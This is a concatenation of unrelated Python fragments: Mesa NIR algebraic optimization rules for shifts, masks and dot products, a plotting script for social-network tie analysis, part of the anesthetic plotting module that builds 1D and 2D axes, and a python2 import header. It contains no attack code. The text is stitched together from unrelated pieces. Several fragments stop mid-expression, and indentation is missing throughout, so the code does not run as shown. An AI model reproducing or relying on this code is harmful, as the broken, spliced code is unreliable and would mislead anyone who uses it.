(('fdot4', ('vec4', a, b, 0.0, 0.0), c), ('fdot2', ('vec2', a, b), c)),
(('fdot4', ('vec4', a, b, c, 0.0), d), ('fdot3', ('vec3', a, b, c), d)),
(('fdot3', ('vec3', a, 0.0, 0.0), b), ('fmul', a, b)),
(('fdot3', ('vec3', a, b, 0.0), c), ('fdot2', ('vec2', a, b), c)),
(('fdot2', ('vec2', a, 0.0), b), ('fmul', a, b)),
(('fdot2', a, 1.0), ('fadd', 'a.x', 'a.y')),
# Lower fdot to fsum when it is available
(('fdot2', a, b), ('fsum2', ('fmul', a, b)), 'options->lower_fdot'),
(('fdot3', a, b), ('fsum3', ('fmul', a, b)), 'options->lower_fdot'),
(('fdot4', a, b), ('fsum4', ('fmul', a, b)), 'options->lower_fdot'),
(('fsum2', a), ('fadd', 'a.x', 'a.y'), 'options->lower_fdot'),
# If x >= 0 and x <= 1: fsat(1 - x) == 1 - fsat(x) trivially
# If x < 0: 1 - fsat(x) => 1 - 0 => 1 and fsat(1 - x) => fsat(> 1) => 1
# If x > 1: 1 - fsat(x) => 1 - 1 => 0 and fsat(1 - x) => fsat(< 0) => 0
(('~fadd', ('fneg(is_used_once)', ('fsat(is_used_once)', 'a(is_not_fmul)')), 1.0), ('fsat', ('fadd', 1.0, ('fneg', a)))),
# (a * #b + #c) << #d
# ((a * #b) << #d) + (#c << #d)
# (a * (#b << #d)) + (#c << #d)
(('ishl', ('iadd', ('imul', a, '#b'), '#c'), '#d'),
('iadd', ('imul', a, ('ishl', b, d)), ('ishl', c, d))),
# (a * #b) << #c
# a * (#b << #c)
(('ishl', ('imul', a, '#b'), '#c'), ('imul', a, ('ishl', b, c))),
])
# Care must be taken here. Shifts in NIR use only the lower log2(bitsize)
# bits of the second source. These replacements must correctly handle the
# case where (b % bitsize) + (c % bitsize) >= bitsize.
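# Worked example for s == 32: (a << 20) << 20 must yield 0, whereas naively
# folding it to a << 40 would be masked by the hardware to a << 8, so the
# folded shift is guarded by the in_bounds bcsel below.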
for s in [8, 16, 32, 64]:
mask = (1 << s) - 1
ishl = "ishl@{}".format(s)
ishr = "ishr@{}".format(s)
ushr = "ushr@{}".format(s)
in_bounds = ('ult', ('iadd', ('iand', b, mask), ('iand', c, mask)), s)
optimizations.extend([
((ishl, (ishl, a, '#b'), '#c'), ('bcsel', in_bounds, (ishl, a, ('iadd', b, c)), 0)),
((ushr, (ushr, a, '#b'), '#c'), ('bcsel', in_bounds, (ushr, a, ('iadd', b, c)), 0)),
# To get -1 for large shifts of negative values, ishr must instead
# clamp the shift count to the maximum value.
((ishr, (ishr, a, '#b'), '#c'),
(ishr, a, ('imin', ('iadd', ('iand', b, mask), ('iand', c, mask)), s - 1))),
])
# Optimize a pattern of address calculation created by DXVK where the offset is
# divided by 4 and then multiplied by 4. This can be turned into an iand and the
# additions before can be reassociated to CSE the iand instruction.
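# Worked example for 32 bits: (a >> 2) << 2 becomes a & (0xffffffff << 2),
# i.e. a & 0xfffffffc, which clears exactly the two bits the shift pair would
# discard.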
for size, mask in ((8, 0xff), (16, 0xffff), (32, 0xffffffff), (64, 0xffffffffffffffff)):
a_sz = 'a@{}'.format(size)
optimizations.extend([
# 'a >> #b << #b' -> 'a & ~((1 << #b) - 1)'
(('ishl', ('ushr', a_sz, '#b'), b), ('iand', a, ('ishl', mask, b))),
(('ishl', ('ishr', a_sz, '#b'), b), ('iand', a, ('ishl', mask, b))),
# This does not trivially work with ishr.
(('ushr', ('ishl', a_sz, '#b'), b), ('iand', a, ('ushr', mask, b))),
])
for log2 in range(1, 7): # powers of two from 2 to 64
v = 1 << log2
mask = 0xffffffff & ~(v - 1)
b_is_multiple = '#b(is_unsigned_multiple_of_{})'.format(v)
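# Worked example for v == 4 (mask 0xfffffffc): since 8 is a multiple of 4,
# (a + 8) & 0xfffffffc == (a & 0xfffffffc) + 8 -- adding a multiple of 4 leaves
# the low two bits of a unchanged, so the iand can be hoisted and CSE'd.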
optimizations.extend([
# Reassociate for improved CSE
(('iand@32', ('iadd@32', a, b_is_multiple), mask), ('iadd', ('iand', a, mask), b)),
])
# To save space in the state tables, reduce to the set that is known to help.
# Previously, this was range(1, 32). In addition, a couple rules inside the
# loop are commented out. Revisit someday, probably after mesa/#2635 has some
# resolution.
for i in [1, 2, 16, 24]:
lo_mask = 0xffffffff >> i
hi_mask = (0xffffffff << i) & 0xffffffff
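# Worked example for i == 16: lo_mask == 0x0000ffff, so
# (a & 0x0000ffff) << 16 == a << 16 -- the bits the mask clears are shifted out
# anyway.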
optimizations.extend([
# This pattern seems to only help in the soft-fp64 code.
(('ishl@32', ('iand', 'a@32', lo_mask), i), ('ishl', a, i)),
# (('ushr@32', ('iand', 'a@32', hi_mask), i), ('ushr', a, i)),
# (('ishr@32', ('iand', 'a@32', hi_mask), i), ('ishr', a, i)),
(('iand', ('ishl', 'a@32', i), hi_mask), ('ishl', a, i)),
(('iand', ('ushr', 'a@32', i), lo_mask), ('ushr', a, i)),
# (('iand', ('ishr', 'a@32', i), lo_mask), ('ushr', a, i)), # Yes, ushr is correct
])
optimizations.extend([
# This is common for address calculations. Reassociating may enable the
# 'a<<c' to be CSE'd. It also helps architectures that have an ISHLADD
# instruction or a constant offset field for in load / store instructions.
(('ishl', ('iadd', a, '#b'), '#c'), ('iadd', ('ishl', a, c), ('ishl', b, c))),
# (a + #b) * #c
(('imul', ('iadd(is_used_once)', a, '#b'), '#c'), ('iadd', ('imul', a, c), ('imul', b, c))),
# Comparison simplifications
(('~inot', ('flt', a, b)), ('fge', a, b)),
(('~inot', ('fge', a, b)), ('flt', a, b)),
(('inot', ('feq', a, b)), ('fneu', a, b)),
(('inot', ('fneu', a, b)), ('feq', a, b)),
(('inot', ('ilt', a, b)), ('ige', a, b)),
(('inot', ('ult', a, b)), ('uge', a, b)),
(('inot', ('ige', a, b)), ('ilt', a, b)),
(('inot', ('uge', a, b)), ('ult', a, b)),
(('inot', ('ieq', a, b)), ('ine', a, b)),
(('inot', ('ine', a, b)), ('ieq', a, b)),
(('iand', ('feq', a, b), ('fneu', a, b)), False),
(('iand', ('flt', a, b), ('flt', b, a)), False),
(('iand', ('ieq', a, b), ('ine', a, b)), False),
(('iand', ('ilt', a, b), ('ilt', b, a)), False),
(('iand', ('ult', a, b), ('ult', b, a)), False),
# This helps some shaders because, after some optimizations, they end up
# with patterns like (-a < -b) || (b < a). In an ideal world, this sort of
# matching would be handled by CSE.
(('flt', ('fneg', a), ('fneg', b)), ('flt', b, a)),
(('fge', ('fneg', a), ('fneg', b)), ('fge', b, a)),
(('feq', ('fneg', a), ('fneg', b)), ('feq', b, a)),
(('fneu', ('fneg', a), ('fneg',
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#7f8c8d", ls='-', label='$=4$',
ecolor='#7f8c8d', marker='p', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [1, 2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(8)]
Y = []
Err = []
for i in range(8):
for j in range(len(avg5)):
H[i].append(mt.log(avg5[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#c0392b", ls='-', label='$=5$',
ecolor='#c0392b', marker='H', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [1, 2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(8)]
Y = []
Err = []
for i in range(8):
for j in range(len(avg6)):
H[i].append(mt.log(avg6[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#8e44ad", ls='-', label='$\geq6$',
ecolor='#8e44ad', marker='8', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.xticks([1, 2, 3, 4, 5, 6, 7, 8], ['1', '2', '3', '4', '5', '6', '7', '8'], fontsize=20)
plt.yticks(fontsize=20)
plt.xlabel("Phase", fontsize=25)
plt.ylabel("$log$(Interaction {})".format(interactions), fontsize=25)
plt.ylim([0.5, 2.5])
legend = plt.legend(frameon=False, loc='upper right', title='Tie Range in Phase 1', fontsize=20)
legend.get_title().set_fontsize(fontsize=20)
plt.title('$ND_{1}\leq5$', fontsize=30)
# plt.title('$5<ND_{1}\leq15$', fontsize=30)
# plt.title('$ND_{1}>15$', fontsize=30)
plt.subplots_adjust(left=0.17, bottom=0.11, right=0.98, top=0.935)
plt.savefig('Plots/SI/Mainresults_LowerDegree_{}.pdf'.format(interactions), format='pdf')
plt.show()
# Fig.~S12(a&b)
def Analysis_Existing(interactions):
Data = read('Results/oldedge/Graph_Season_TR_{}.txt'.format(interactions))
avg2, avg3, avg4, avg5, avg6 = [], [], [], [], []
GH = nx.read_gexf('Graph/Season/Frequency/G_Frequency_Season_1.gexf')
Large = max(nx.connected_components(GH),key=len)
for data in Data:
if data.count('-1') == 0:
if data[0] in Large and data[1] in Large:
if data[2] == '2':
avg2.append(list(map(int, map(float, data[9:]))))
if data[2] == '3':
avg3.append(list(map(int, map(float, data[9:]))))
if data[2] == '4':
avg4.append(list(map(int, map(float, data[9:]))))
if data[2] == '5':
avg5.append(list(map(int, map(float, data[9:]))))
if int(data[2]) >= 6 and int(data[2]) < 100:
avg6.append(list(map(int, map(float, data[9:]))))
fig = plt.figure(figsize=(7, 7))
ax = plt.axes()
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg2)):
H[i].append(mt.log(avg2[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#34495e", ls='-', label='$=2$',
ecolor='#34495e', marker='^', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg3)):
H[i].append(mt.log(avg3[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#2980b9", ls='-', label='$=3$',
ecolor='#2980b9', marker='s', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg4)):
H[i].append(mt.log(avg4[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#7f8c8d", ls='-', label='$=4$',
ecolor='#7f8c8d', marker='p', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg5)):
H[i].append(mt.log(avg5[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#c0392b", ls='-', label='$=5$',
ecolor='#c0392b', marker='H', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg6)):
H[i].append(mt.log(avg6[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#8e44ad", ls='-', label='$\geq6$',
ecolor='#8e44ad', marker='8', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.xticks([2, 3, 4, 5, 6, 7, 8], ['2', '3', '4', '5', '6', '7', '8'], fontsize=20)
plt.yticks(fontsize=20)
plt.xlabel("Phase", fontsize=25)
plt.ylabel("$log$(Interaction {})".format(interactions), fontsize=25)
legend = plt.legend(frameon=False, loc='upper right', title='Tie Range in Phase 2', fontsize=20)
legend.get_title().set_fontsize(fontsize=20)
plt.title('Existing Ties',fontsize=30)
if interactions == 'Duration':
plt.ylim([1, 8])
plt.subplots_adjust(left=0.11, bottom=0.11, right=0.98, top=0.935)
plt.savefig('Plots/SI/Mainresults_ExistingTies_D.pdf', format='pdf')
if interactions == 'Frequency':
plt.ylim([0.5, 3])
plt.subplots_adjust(left=0.145, bottom=0.11, right=0.98, top=0.935)
plt.savefig('Plots/SI/Mainresults_ExistingTies_F.pdf', format='pdf')
plt.show()
# Fig.~S12(d&e)
def Analysis_Newlyformed(interactions):
Data = read('Results/newedge/Graph_Season_TR_{}.txt'.format(interactions))
avg2, avg3, avg4, avg5, avg6 = [], [], [], [], []
GH = nx.read_gexf('Graph/Season/Frequency/G_Frequency_Season_1.gexf')
Large = max(nx.connected_components(GH),key=len)
for data in Data:
if data.count('-1') == 0:
if data[0] in Large and data[1] in Large:
if data[2] == '2':
avg2.append(list(map(int, map(float, data[9:]))))
if data[2] == '3':
avg3.append(list(map(int, map(float, data[9:]))))
if data[2] == '4':
avg4.append(list(map(int, map(float, data[9:]))))
if data[2] == '5':
avg5.append(list(map(int, map(float, data[9:]))))
if int(data[2]) >= 6 and int(data[2]) < 100:
avg6.append(list(map(int, map(float, data[9:]))))
fig = plt.figure(figsize=(7, 7))
ax = plt.axes()
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg2)):
H[i].append(mt.log(avg2[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#34495e", ls='--', label='$=2$',
ecolor='#34495e', marker='^', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg3)):
H[i].append(mt.log(avg3[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#2980b9", ls='--', label='$=3$',
ecolor='#2980b9', marker='s', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg4)):
H[i].append(mt.log(avg4[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#7f8c8d", ls='--', label='$=4$',
ecolor='#7f8c8d', marker='p', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg5)):
H[i].append(mt.log(avg5[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#c0392b", ls='--', label='$=5$',
ecolor='#c0392b', marker='H', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg6)):
H[i].append(mt.log(avg6[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#8e44ad", ls='--', label='$\geq6$',
ecolor='#8e44ad', marker='8', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.xticks([2, 3, 4, 5, 6, 7, 8], ['2', '3', '4', '5', '6', '7', '8'], fontsize=20)
plt.yticks(fontsize=20)
plt.xlabel("Phase", fontsize=25)
plt.ylabel("$log$(Interaction {})".format(interactions), fontsize=25)
legend = plt.legend(frameon=False, loc='upper right', title='Tie Range in Phase 2', fontsize=20)
legend.get_title().set_fontsize(fontsize=20)
plt.title('Newly Formed Ties', fontsize=30)
if interactions == 'Frequency':
plt.ylim([0, 1.2])
plt.subplots_adjust(left=0.145, bottom=0.11, right=0.98, top=0.935)
plt.savefig('Plots/SI/Mainresults_NewTies_F.pdf', format='pdf')
if interactions == 'Duration':
plt.ylim([0, 5])
plt.subplots_adjust(left=0.145, bottom=0.11, right=0.98, top=0.935)
plt.savefig('Plots/SI/Mainresults_NewTies_D.pdf', format='pdf')
# plt.show()
# Fig.~S12(c&f)
def Existing_Newlyformed_pp(choice):
if choice == 1:
Data = read('Results/oldedge/Graph_Season_TR_Frequency.txt')
if choice == 2:
Data = read('Results/newedge/Graph_Season_TR_Frequency.txt')
avg2, avg3, avg4, avg5, avg6 = [], [], [], [], []
GH = nx.read_gexf('Graph/Season/Frequency/G_Frequency_Season_1.gexf')
Large = max(nx.connected_components(GH),key=len)
for data in Data:
if data.count('-1') == 0:
if data[0] in Large and data[1] in Large:
if data[2] == '2':
avg2.append(list(map(int, map(float, data[9:]))))
if data[2] == '3':
avg3.append(list(map(int, map(float, data[9:]))))
if data[2] == '4':
avg4.append(list(map(int, map(float, data[9:]))))
if data[2] == '5':
avg5.append(list(map(int, map(float, data[9:]))))
if int(data[2]) >= 6 and int(data[2]) < 100:
avg6.append(list(map(int, map(float, data[9:]))))
H = []
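# For each tie-range group, compute the fraction of ties with nonzero
# interaction frequency in phases 3-8, i.e. the share of phase-2 ties that are
# still active later on; a constant 1.0 is appended for phase 2 itself below.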
Count = [0 for _ in range(6)]
for data in avg2:
for _ in range(6):
if data[_ + 1] == 0:
Count[_] += 1
for _ in range(6):
H.append([1 - Count[_] / len(avg2), '$=2$', int(_ + 3)])
Count = [0 for _ in range(6)]
for data in avg3:
for _ in range(6):
if data[_ + 1] == 0:
Count[_] += 1
for _ in range(6):
H.append([1 - Count[_] / len(avg3), '$=3$', int(_ + 3)])
Count = [0 for _ in range(6)]
for data in avg4:
for _ in range(6):
if data[_ + 1] == 0:
Count[_] += 1
for _ in range(6):
H.append([1 - Count[_] / len(avg4), '$=4$', int(_ + 3)])
Count = [0 for _ in range(6)]
for data in avg5:
for _ in range(6):
if data[_ + 1] == 0:
Count[_] += 1
for _ in range(6):
H.append([1 - Count[_] / len(avg5), '$=5$', int(_ + 3)])
Count = [0 for _ in range(6)]
for data in avg6:
for _ in range(6):
if data[_ + 1] == 0:
Count[_] += 1
for _ in range(6):
H.append([1 - Count[_] / len(avg6), '$\geq6$', int(_ + 3)])
H.append([1, '$=2$', 2])
H.append([1, '$=3$', 2])
H.append([1, '$=4$', 2])
H.append([1, '$=5$', 2])
H.append([1, '$\geq6$', 2])
if choice == 1:
fig = plt.figure(figsize=(7, 7))
ax = plt.axes()
X = [2, 3, 4, 5, 6, 7, 8]
Y = [1, 0.736412550974173, 0.7031490711372904, 0.630629814227458, 0.592359537834164, 0.5328103760761214,
0.5092659719075668]
plt.plot(X, Y, color='#34495e', label='$=2$', marker='^', markersize=10, linewidth=2)
Y = [1, 0.5344482512975338, 0.5021540757827606, 0.4311883035381119, 0.39811391159808673, 0.3356965975779368,
0.3241968859187897]
plt.plot(X, Y, color='#2980b9',
"""Lower-level plotting tools.
Users wishing for more fine-grained control may wish to use
- ``make_1d_axes``
- ``make_2d_axes``
to create a set of axes and legend proxies.
"""
import numpy as np
import pandas
import matplotlib.pyplot as plt
from scipy.stats import gaussian_kde
from matplotlib.gridspec import GridSpec as GS, GridSpecFromSubplotSpec as SGS
try:
from astropy.visualization import hist
except ImportError:
pass
try:
from anesthetic.kde import fastkde_1d, fastkde_2d
except ImportError:
pass
import matplotlib.cbook as cbook
import matplotlib.lines as mlines
from matplotlib.ticker import MaxNLocator
from matplotlib.colors import LinearSegmentedColormap
from matplotlib.transforms import Affine2D
from anesthetic.utils import check_bounds, nest_level
from anesthetic.utils import (sample_compression_1d, quantile,
triangular_sample_compression_2d,
iso_probability_contours,
iso_probability_contours_from_samples,
scaled_triangulation, match_contour_to_contourf)
from anesthetic.boundary import cut_and_normalise_gaussian
class AxesSeries(pandas.Series):
"""Anesthetic's axes version of `pandas.Series`."""
@property
def _constructor(self):
return AxesSeries
@property
def _constructor_expanddim(self):
return AxesDataFrame
class AxesDataFrame(pandas.DataFrame):
"""Anesthetic's axes version of `pandas.DataFrame`."""
@property
def _constructor(self):
return AxesDataFrame
@property
def _constructor_sliced(self):
return AxesSeries
def axlines(self, params, values, **kwargs):
"""Add vertical and horizontal lines across all axes.
Parameters
----------
params : str or list(str)
parameter label(s).
Should match the size of `values`.
values : float or list(float)
value(s) at which vertical and horizontal lines shall be added.
Should match the size of `params`.
kwargs
Any kwarg that can be passed to `plt.axvline` or `plt.axhline`.
"""
params = np.ravel(params)
values = np.ravel(values)
if params.size != values.size:
raise ValueError("The sizes of `params` and `values` must match "
"exactly, but params.size=%s and values.size=%s."
% (params.size, values.size))
for i, param in enumerate(params):
if param in self.columns:
for ax in self.loc[:, param]:
if ax is not None:
ax.axvline(values[i], **kwargs)
if param in self.index:
for ax in self.loc[param, self.columns != param]:
if ax is not None:
ax.axhline(values[i], **kwargs)
def axspans(self, params, vmins, vmaxs, **kwargs):
"""Add vertical and horizontal spans across all axes.
Parameters
----------
params : str or list(str)
parameter label(s).
Should match the size of `vmins` and `vmaxs`.
vmins : float or list(float)
Minimum value of the vertical and horizontal axes spans.
Should match the size of `params`.
vmaxs : float or list(float)
Maximum value of the vertical and horizontal axes spans.
Should match the size of `params`.
kwargs
Any kwarg that can be passed to `plt.axvspan` or `plt.axhspan`.
"""
kwargs = normalize_kwargs(kwargs, dict(color=['c']))
params = np.ravel(params)
vmins = np.ravel(vmins)
vmaxs = np.ravel(vmaxs)
if params.size != vmins.size:
raise ValueError("The sizes of `params`, `vmins` and `vmaxs` must "
"match exactly, but params.size=%s, "
"vmins.size=%s and vmaxs.size=%s."
% (params.size, vmins.size, vmaxs.size))
for i, param in enumerate(params):
if param in self.columns:
for ax in self.loc[:, param]:
if ax is not None:
ax.axvspan(vmins[i], vmaxs[i], **kwargs)
if param in self.index:
for ax in self.loc[param, self.columns != param]:
if ax is not None:
ax.axhspan(vmins[i], vmaxs[i], **kwargs)
def make_1d_axes(params, **kwargs):
"""Create a set of axes for plotting 1D marginalised posteriors.
Parameters
----------
params: list(str)
names of parameters.
tex: dict(str:str), optional
Dictionary mapping params to tex plot labels.
fig: matplotlib.figure.Figure, optional
Figure to plot on.
Default: matplotlib.pyplot.figure()
ncols: int
Number of columns in the plot
option, default ceil(sqrt(num_params))
subplot_spec: matplotlib.gridspec.GridSpec, optional
gridspec to plot array as part of a subfigure
Default: None
Returns
-------
fig: matplotlib.figure.Figure
New or original (if supplied) figure object
axes: pandas.Series(matplotlib.axes.Axes)
Pandas array of axes objects
"""
axes = AxesSeries(index=np.atleast_1d(params), dtype=object)
axes[:] = None
tex = kwargs.pop('tex', {})
fig = kwargs.pop('fig') if 'fig' in kwargs else plt.figure()
ncols = kwargs.pop('ncols', int(np.ceil(np.sqrt(len(axes)))))
nrows = int(np.ceil(len(axes)/float(ncols)))
if 'subplot_spec' in kwargs:
grid = SGS(nrows, ncols, wspace=0,
subplot_spec=kwargs.pop('subplot_spec'))
else:
grid = GS(nrows, ncols, wspace=0)
if kwargs:
raise TypeError('Unexpected **kwargs: %r' % kwargs)
tex = {p: tex[p] if p in tex else p for p in axes.index}
for p, g in zip(axes.index, grid):
axes[p] = ax = fig.add_subplot(g)
ax.set_xlabel(tex[p])
ax.set_yticks([])
for x, ax in axes.dropna().iteritems():
ax.xaxis.set_major_locator(MaxNLocator(2, integer=True))
return fig, axes
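# Minimal usage sketch (the parameter names are placeholders, not part of the
# anesthetic API):
#     fig, axes = make_1d_axes(['x0', 'x1', 'x2'], ncols=3, tex={'x0': '$x_0$'})
#     axes['x0'].hist(np.random.randn(1000))  # each entry is a matplotlib Axes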
def make_2d_axes(params, **kwargs):
"""Create a set of axes for plotting 2D marginalised posteriors.
Parameters
----------
params: lists of parameters
Can be either:
* list(str) if the x and y axes are the same
* [list(str),list(str)] if the x and y axes are different
Strings indicate the names of the parameters
tex: dict(str:str), optional
Dictionary mapping params to tex plot labels.
Default: params
upper, lower, diagonal: logical, optional
Whether to create 2D marginalised plots above or below the
diagonal, or to create a 1D marginalised plot on the diagonal.
Default: True
fig: matplotlib.figure.Figure, optional
Figure to plot on.
Default: matplotlib.pyplot.figure()
ticks: str
If 'outer', plot ticks only on the very left and very bottom.
If 'inner', plot ticks also in inner subplots.
If None, plot no ticks at all.
Default: 'outer'
subplot_spec: matplotlib.gridspec.GridSpec, optional
gridspec to plot array as part of a subfigure.
Default: None
Returns
-------
fig: matplotlib.figure.Figure
New or original (if supplied) figure object
axes: pandas.DataFrame(matplotlib.axes.Axes)
Pandas array of axes objects
"""
if nest_level(params) == 2:
xparams, yparams = params
else:
xparams = yparams = params
ticks = kwargs.pop('ticks', 'outer')
upper = kwargs.pop('upper', True)
lower = kwargs.pop('lower', True)
diagonal = kwargs.pop('diagonal', True)
axes = AxesDataFrame(index=np.atleast_1d(yparams),
columns=np.atleast_1d(xparams),
dtype=object)
axes[:][:] = None
all_params = list(axes.columns) + list(axes.index)
for j, y in enumerate(axes.index):
for i, x in enumerate(axes.columns):
if all_params.index(x) < all_params.index(y):
if lower:
axes[x][y] = -1
elif all_params.index(x) > all_params.index(y):
if upper:
axes[x][y] = +1
elif diagonal:
axes[x][y] = 0
axes.dropna(axis=0, how='all', inplace=True)
axes.dropna(axis=1, how='all', inplace=True)
tex = kwargs.pop('tex', {})
tex = {p: tex[p] if p in tex else p for p in all_params}
fig = kwargs.pop('fig') if 'fig' in kwargs else plt.figure()
spec = kwargs.pop('subplot_spec', None)
if axes.shape[0] != 0 and axes.shape[1] != 0:
if spec is not None:
grid = SGS(*axes.shape, hspace=0, wspace=0, subplot_spec=spec)
else:
grid = GS(*axes.shape, hspace=0, wspace=0)
if kwargs:
raise TypeError('Unexpected **kwargs: %r' % kwargs)
if axes.size == 0:
return fig, axes
position = axes.copy()
axes[:][:] = None
for j, y in enumerate(axes.index[::-1]):
for i, x in enumerate(axes.columns):
if position[x][y] is not None:
sx = list(axes[x].dropna())
sx = sx[0] if sx else None
sy = list(axes.T[y].dropna())
sy = sy[0] if sy else None
axes[x][y] = fig.add_subplot(grid[axes.index.size-1-j, i],
sharex=sx, sharey=sy)
if position[x][y] == 0:
axes[x][y].twin = axes[x][y].twinx()
axes[x][y].twin.set_yticks([])
axes[x][y].twin.set_ylim(0, 1.1)
axes[x][y].set_zorder(axes[x][y].twin.get_zorder() + 1)
axes[x][y].lines = axes[x][y].twin.lines
axes[x][y].patches = axes[x][y].twin.patches
axes[x][y].collections = axes[x][y].twin.collections
axes[x][y].containers = axes[x][y].twin.containers
make_diagonal(axes[x][y])
axes[x][y].position = 'diagonal'
axes[x][y].twin.xaxis.set_major_locator(
MaxNLocator(3, prune='both'))
else:
if position[x][y] == 1:
axes[x][y].position = 'upper'
elif position[x][y] == -1:
axes[x][y].position = 'lower'
axes[x][y].yaxis.set_major_locator(
MaxNLocator(3, prune='both'))
axes[x][y].xaxis.set_major_locator(
MaxNLocator(3, prune='both'))
for y, ax in axes.bfill(axis=1).iloc[:, 0].dropna().iteritems():
ax.set_ylabel(tex[y])
for x, ax in axes.ffill(axis=0).iloc[-1, :].dropna().iteritems():
ax.set_xlabel(tex[x])
# left and right ticks and labels
for y, ax in axes.iterrows():
ax_ = ax.dropna()
if len(ax_) and ticks == 'inner':
for i, a in enumerate(ax_):
if i == 0: # first column
if a.position == 'diagonal' and len(ax_) == 1:
a.tick_params('y', left=False, labelleft=False)
else:
a.tick_params('y', left=True, labelleft=True)
elif a.position == 'diagonal': # not first column
tl = a.yaxis.majorTicks[0].tick1line.get_markersize()
a.tick_params('y', direction='out', length=tl/2,
left=True, labelleft=False)
else: # not diagonal and not first column
a.tick_params('y', direction='inout',
left=True, labelleft=False)
elif len(ax_) and ticks == 'outer': # no inner ticks
for a in ax_[1:]:
a.tick_params('y', left=False, labelleft=False)
elif len(ax_) and ticks is None: # no ticks at all
for a in ax_:
a.tick_params('y', left=False, right=False,
labelleft=False, labelright=False)
else:
raise ValueError(
"ticks=%s was requested, but ticks can only be one of "
"['outer', 'inner', None]." % ticks)
# bottom and top ticks and labels
for x, ax in axes.iteritems():
ax_ = ax.dropna()
if len(ax_):
if ticks == 'inner':
for i, a in enumerate(ax_):
if i == len(ax_) - 1: # bottom row
a.tick_params('x', bottom=True, labelbottom=True)
else: # not bottom row
a.tick_params('x', direction='inout',
bottom=True, labelbottom=False)
if a.position == 'diagonal':
a.twin.tick_params('x', direction='inout',
bottom=True, labelbottom=False)
elif ticks == 'outer': # no inner ticks
for a in ax_[:-1]:
a.tick_params('x', bottom=False, labelbottom=False)
elif ticks is None: # no ticks at all
for a in ax_:
a.tick_params('x', bottom=False, top=False,
labelbottom=False, labeltop=False)
else:
raise ValueError(
"ticks=%s was requested, but ticks can only be one of "
"['outer', 'inner', None]." % ticks)
return fig, axes
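# Minimal usage sketch (parameter names are placeholders): with
#     fig, axes = make_2d_axes(['x0', 'x1'], upper=False)
# axes is an AxesDataFrame; axes['x0']['x1'] holds the lower-triangle Axes for
# the (x0, x1) pair and axes['x0']['x0'] the diagonal Axes (whose .twin carries
# the 1D marginal plots).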
def fastkde_plot_1d(ax, data, *args, **kwargs):
"""Plot a 1d marginalised distribution.
This functions as a wrapper around matplotlib.axes.Axes.plot, with a kernel
density estimation computation provided by the package
#!/usr/bin/env python2
import datetime as dt
import glob as glob
import os as os
import re
import shutil as shutil
